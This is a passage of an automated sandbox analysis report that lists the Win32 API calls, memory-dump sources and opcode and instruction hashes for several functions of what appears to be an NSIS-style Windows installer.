                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                      • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                      • String ID:
                                      • API String ID: 2987980305-0
                                      • Opcode ID: 295b2aa844a57aa1650ec08b3fbb112542546d6ed002a0d7a8fdf70b8c7bc2fa
                                      • Instruction ID: d3abe0a985e527f0133db3cb222e4045a6b822903cb71d54981d30858ec5e20d
                                      • Opcode Fuzzy Hash: 295b2aa844a57aa1650ec08b3fbb112542546d6ed002a0d7a8fdf70b8c7bc2fa
                                      • Instruction Fuzzy Hash: 01213032904211ABCF207F64CE49A6F79B0AF44358F20413BF601B62D1D7BD4E419A5E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040231A Relevance: 6.1, APIs: 4, Instructions: 71registrystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402358
                                      • lstrlenA.KERNEL32(0040A398,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402378
                                      • RegSetValueExA.ADVAPI32(?,?,?,?,0040A398,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B1
                                      • RegCloseKey.ADVAPI32(?,?,?,0040A398,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: CloseCreateValuelstrlen
                                      • String ID:
                                      • API String ID: 1356686001-0
                                      • Opcode ID: 62cac39b2e001f96040e268342fc38afedce00ecc07eb665eb786a4124eb70cf
                                      • Instruction ID: 496afd6724d83472fd7aeeeeb6c9636b40b67d15b6efd44fac0fbba193c6cb19
                                      • Opcode Fuzzy Hash: 62cac39b2e001f96040e268342fc38afedce00ecc07eb665eb786a4124eb70cf
                                      • Instruction Fuzzy Hash: 40116071E00208BEEB10EFB5CE89EAF7A78EB44358F10403AF905B61D1D6B85D419A69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004015B3 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004056BD: CharNextA.USER32(?,00000000,?,?,004015C2,00000000,000000F0), ref: 004056CB
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000,?,?,004015C2,00000000,000000F0), ref: 004056D0
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000,?,?,004015C2,00000000,000000F0), ref: 004056E4
                                      • CreateDirectoryA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                      • GetFileAttributesA.KERNEL32(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                      • SetCurrentDirectoryA.KERNEL32(00000000,007A8800,00000000,00000000,000000F0), ref: 00401622
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                      • String ID:
                                      • API String ID: 3751793516-0
                                      • Opcode ID: 3665ca61bb8be5a4da9b2d20c6af589533fd28194ffa40c137a535fff9372203
                                      • Instruction ID: be2e729169105f21f0136a8afe605fb55404e4043758c9297c14daf22ca337c6
                                      • Opcode Fuzzy Hash: 3665ca61bb8be5a4da9b2d20c6af589533fd28194ffa40c137a535fff9372203
                                      • Instruction Fuzzy Hash: A7114831908150ABDB213F755D04EBF77B4EE56366724073FF492B22E2C63C09429A2E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00401EDC Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                      • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                      • String ID:
                                      • API String ID: 1404258612-0
                                      • Opcode ID: 8a065e25df513d2c70edfbb38d14aece4aa2bad1db351d2eec3c415220230595
                                      • Instruction ID: d9cf4706ccd720fe68a9057b37b388a6d3cc99dc36037c8cf20abe177969b22e
                                      • Opcode Fuzzy Hash: 8a065e25df513d2c70edfbb38d14aece4aa2bad1db351d2eec3c415220230595
                                      • Instruction Fuzzy Hash: 02117071900108BEDB01EFA5DD81DAEBBB9EF04344B20807AF505F61E2D7789E54DB28
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402BCF Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(?,00000000,00402DAF,00000001), ref: 00402BE2
                                      • GetTickCount.KERNEL32 ref: 00402C00
                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: 7de69ba99e19708d0d579c18d4dfd725f7e56dba20af062519453b561e00e44c
                                      • Instruction ID: d1c4e1838bfb856cd6d3ea9dd85ee240d54de3540c59ddf7a57925f8cf4fbe18
                                      • Opcode Fuzzy Hash: 7de69ba99e19708d0d579c18d4dfd725f7e56dba20af062519453b561e00e44c
                                      • Instruction Fuzzy Hash: 52F0D030909620BFC6616F18BD4CE5F7BA4E745B117518467F204A11A5D27CA8838FAD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405854 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405868
                                      • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405882
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: nsa
                                      • API String ID: 1716503409-2209301699
                                      • Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                      • Instruction ID: 7032c49e779d22ef4b019cebcd704e5cdda6a64cd28d021928a5f34cef86c798
                                      • Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                      • Instruction Fuzzy Hash: 21F082777082046BDB109F66DC04B9B7B9CDF95750F14C03BFE44DA180D6B499548B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040578A Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(0040599C,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                      • lstrcmpiA.KERNEL32(00000000,0040599C), ref: 004057B2
                                      • CharNextA.USER32(00000000,?,00000000,0040599C,00000000,[Rename]), ref: 004057C3
                                      • lstrlenA.KERNEL32(00000000,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                      Memory Dump Source
                                      • Source File: 00000088.00000002.134606570157.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000088.00000002.134606494894.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606647727.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000088.00000002.134606848435.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                      • Instruction ID: df48b93824ef6af08d299fa443af8079e3e9d2208639ace1cb57769ac35cd01d
                                      • Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                      • Instruction Fuzzy Hash: DBF0C235504518FFC7029BA5DC4099FBBB8EF45350F2540AAF800F7210D274EE01ABA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%